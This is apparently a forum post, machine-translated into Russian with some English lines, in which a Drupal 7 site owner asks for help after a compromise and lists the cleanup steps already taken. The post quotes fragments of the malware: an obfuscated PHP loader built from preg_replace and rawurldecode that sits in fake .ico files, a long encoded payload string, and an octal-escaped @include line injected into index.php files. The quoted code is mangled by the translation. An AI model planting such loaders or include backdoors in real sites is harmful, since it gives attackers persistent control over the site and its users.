Мой сайт на drupal 7 недавно был взломан - я думаю, из-за исправленной критической проблемы (у меня было две минорные версии, более старые, чем последняя), но я не могу сделать это снова.
Что происходит:
Время от времени (вероятно, вызванный доступом к какой-либо странице) сайт попадает во внутреннюю ошибку, когда корневой URL-адрес показывает что-то вроде (извините - я забыл записать это время) "Ошибка PHP, ожидается), но обнаружена в.... есть некоторый путь к .ico-файлу "
Этот ico-файл содержит только некоторый PHP-код.и расположен в разных местах, обычно он имеет имя, например .fsdr4ef.ico и находится в случайных местах, таких как modues / file
Пример содержимого:
pk / (/ vz8rq / обрезки / mvo0 / (/ V / preg_replace / m6yf / (/ QP / rawurldecode / S8 / (/ 13rz / "% 2F% 5C% 28.% 2A% 24% 2F" / es /) / ctyo /, '', FILE / st8j1 /) / htzf3 // p6i25 /) / k1vd // k5 /) / dh0 /; $ 6famu = "G% 00% 17K% 12% 07% 03S% 0A% 40% 0C% 07G% 09% 15C% 11V%02% 0Bj% 00A% 07% 17% 0AV% 12h% 00A% 06% 07A% 06% 0ENJF% 24% 1D% 3D% 07V% 05% 0F% 5B% 06% 06N% 10% 1B% 5C% 03V%0El% 00% 09% 5B% 17K% 11% 170M% 14R% 02G% 06F% 12O% 0EXJT% 24л% 17GY% 0E% 16D% 10% 0ETCV% 1EQ% 00X% 13% 05% 13% 5B% 00Z%00% 0C% 01% 0E% 14F% 04C% 06% 0DEK% 0A% 13% 0B% 1FG% 10% 1BC% 17% 0C% 0AA% 14% 40% 1D% 0C% 1EZOLG% 40% 04% 0 C%5E% 0E% 5D% 08CR% 0EA% 10X% 13% 05% 09GK% 0A% 00% 5E % 15F% 13% 0A% 13_FF% 17% 5C% 05% 06% 01% 06BM% 0BC% 0A% 10% 1CX% 0em% 0AD% 05OLG% 40% 04% 0 C% 5E% 0E% 5D% 08CA% 13F% 5E% 10% 40% 06% 12% 1DГ.А.% 05% 17% 18% 40% 12X% 12G8BO% 0B% 5E% 00% 154% 0A% 0Fj% 3E% 1ACY% 15GA% 05% 17% 18% 40% 12X% 12G8BO% 0B% 5E% 00%154% 0A% 0Fj% 3E% 13YF% 11% 19F% 19% 0A% 19uB% 5E% 3E% 08% 1EL% 11% 1BO% 18% 05% 05M% 09U% 0E% 0EA% 14T% 14% 5B%1B% 0FM% 0EH% 17AW% 06% 05Z% 07KKX% 1DK% 12B% 11% 5DCBM% 02_% 0F% 09% 0CA% 04ZK% 17% 10% 01_% 08C% 1A% 02F% 15% 1B% 3DGR%14% 13% 40% 1BX% 1E% 0A% 16% 5BF% 0AC% 14FRgF% 1A_F% 5B% 7CC% 03U% 16% 06R% 02% 20% 196% 02% 2A_C% 609% 1646p% 0AG% 28%0A0% 60% 27uFd3Cb% 1A% 0B% 3EWVA% 3FnFd% 15C% 40% 29% 0B% 5D1J% 1AP% 12% 06% 07DH% 3FD% 19% 2AT0O% 23FFd9Cb3% 60% 2
иэто намного длиннее.
Это ico include вызывается случайно сгенерированными файлами index.php, расположенными также в разных каталогах (и код также находится в главном index.php в корневой папке)
/ 55b79 /
@ include "\ 057d \ 141t \ 141 / \ 167e \ 142 / \ 166i \ 162t \ 165a \ 154s \ 0571 \ 0670 \ 0676 \ 070 / \ 166i\ 162t \ 165a \ 154 / \ 167w \ 167 / \ 155o \ 144u \ 154e \ 163 / \ 146i \ 154e \ 057. \ 1467 \ 1433 \ 143f \ 065c \ 056i \ 143o ";
/ 55b79 /
Что я делал до сих пор:
I changed my FTP password
Deleted everything by sites/ folde
Uploaded a lates Drupal 7 version
Searched and deleted all index.php files and suspicious .ico files
Changed Drupal admin password
Updated all modules and removed unsused ones
Все вроде бы работалохорошо, но через несколько дней та же проблема - я действительно не знаю, как это может происходить?Я искал даже внутри всего файла .php, чтобы выяснить, где можно создать этот index.php, но ничего не нашел.
Спасибо за любую помощь.
TC